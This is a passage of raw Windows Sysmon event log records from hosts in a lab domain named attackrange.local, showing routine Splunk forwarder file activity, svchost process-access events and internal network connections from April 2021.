Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=498BE96DEBDBFC9CD9E4460C031383E8,SHA256=8067A93F0D98BFB5C8101DA6903AB98273E84414DFD851963F8B7378E8F3F1CA,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606558Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.946{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606557Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.946{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849E2B603171B73555D527872FC5F1EE,SHA256=746064D29E63240B1FFF2519996C68EB8600A720D828B35F1E2A9E996E108C71falsefalse - insufficient disk space 23542300x80000000000000001095268Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:37.639{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB049457F06B575B0228FC3E3BFB7D58,SHA256=B6B48DA376DAB747930DF6E71DE1F1D552275ECAAF0E72586654D6EEE70CCA36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095267Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:37.516{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095266Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:37.516{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606560Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:38.964{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606559Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:38.964{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307EF100D190AABE86124375632405B2,SHA256=96C294C554EE3845366EC8E6CEB3A9FFDFB42F9E58C5C5A98E61EA7932800890falsefalse - insufficient disk space 23542300x80000000000000001095271Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:38.649{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B96D57FB12D25A2415F71CD6C286BA,SHA256=562295BC6348DB51CA3945E8AD41B82DD621765840DC62C6A5F1941AAB0B8A0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095270Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:38.517{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095269Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:38.517{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606567Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.966{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606566Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.966{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14A7C39DE5BD8A5706C5EEE698DBBD29,SHA256=7A2D21FA4A4B688E1892F78B0AECBA566623A66C275F288B038CFD8520804471falsefalse - insufficient disk space 23542300x80000000000000001095274Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.653{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C4E96A077CCB4E92F5BCA0BA2700702,SHA256=0CC0857335C61B95C7BB43EA166045AFBE88C2C1AAEA35F942F9D324FE0029E9,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001606565Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:37.762{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49734-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606564Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606563Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05845FA7006DE939CD04892F44D6EECE,SHA256=B736DB483C48D70A1B1C89D815986D2565F5F3042BBCFE5298EF3296C74456A5falsefalse - insufficient disk space 11241100x80000000000000001606562Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606561Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:39.249{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E9474A9EADFC2B125A0D69830B75271,SHA256=8D9881E357FF80DA711C4F8E02D7F9A14D63A6C20A3F0D8A21E81F44D3480FBAfalsefalse - insufficient disk space 10341000x80000000000000001095273Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095272Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:39.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606569Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:40.969{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606568Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:40.969{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70938E213681DB9FB8C716D3B0335871,SHA256=5EA45A0AF43A61D2E3651C91F6C5C86C280CF50C631F4519C13ACEBEB11352A0falsefalse - insufficient disk space 23542300x80000000000000001095278Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.657{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21BEF0005C1FA5B0DBFEC6DB4F210AAF,SHA256=39FCA2B0538B8C50D02793C74F9DE890983DC9B67A98EE4C0C645CC838B2FBBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095277Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095276Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:40.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095275Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:40.381{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CABE4C814560937ED11DA6AB88F25692,SHA256=B5B0513CC19D4A02998804D36D1A1C84B09796C39A7DAC72A82A4B43F2BEEABF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606571Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:41.971{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606570Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:41.971{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E6791E2BBB1D08F510CD76BB8FAA5CE,SHA256=491FE1B13B22146E5F02C4F29D1DC1882B8D562ED5F7D52888466856FC89D56Cfalsefalse - insufficient disk space 
354300x80000000000000001095282Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.820{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1160-false10.0.1.12-8000- 23542300x80000000000000001095281Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:41.666{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9758FD184E1F0A325FBDFC1A02B369D8,SHA256=B091F7D0F4523D7703A16475A29A41604743321D5DB845AF96BD3F4AD705EED5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095280Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:41.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095279Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:41.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606573Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:42.974{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606572Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:42.974{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=376EE83E11DE7EFCA799FD4B6BD5E290,SHA256=64C5C3547A01E409D547B2486F80648EFCDF2DE388F11A156EE83687D89C5AF4falsefalse - insufficient disk space 23542300x80000000000000001095285Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.669{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=227F2CB24136EFE45B35D8FE41C8A275,SHA256=8BA32F7D6692AA51B4924885375DAD3A4590814B79FB4BE1691EFD41D1787E9F,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001095284Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095283Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.518{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606575Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.992{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606574Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.992{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA65B7059E5706024727429682E880EC,SHA256=915CB2534207A2E650DADD6C33D6C939803604F332B0675F87D0FD7945A77D05falsefalse - insufficient disk space 23542300x80000000000000001095288Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:43.679{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B1BDE2142BAB2C5480672B1C41F8A84,SHA256=F7DFFEDCB809810EB6776C3A50C732B59720D05CBD084633EE062858BBE51438,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095287Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:43.519{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095286Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:43.519{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095291Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:44.687{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD9C9720E93FC277AEB234BE008E84E,SHA256=695B6043A92A17DC6885BAEC41F903D59FEBDE6635D93433E45145DDF9F7F7B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095290Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:44.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095289Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:44.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095294Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.693{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793A58A465462CEE21B05C65A89D4405,SHA256=942EAFA0ABFECE5C4302C3204A765E4F4F206AE2FF17CD705D3FC18E1806DFDB,IMPHASH=00000000000000000000000000000000falsetrue 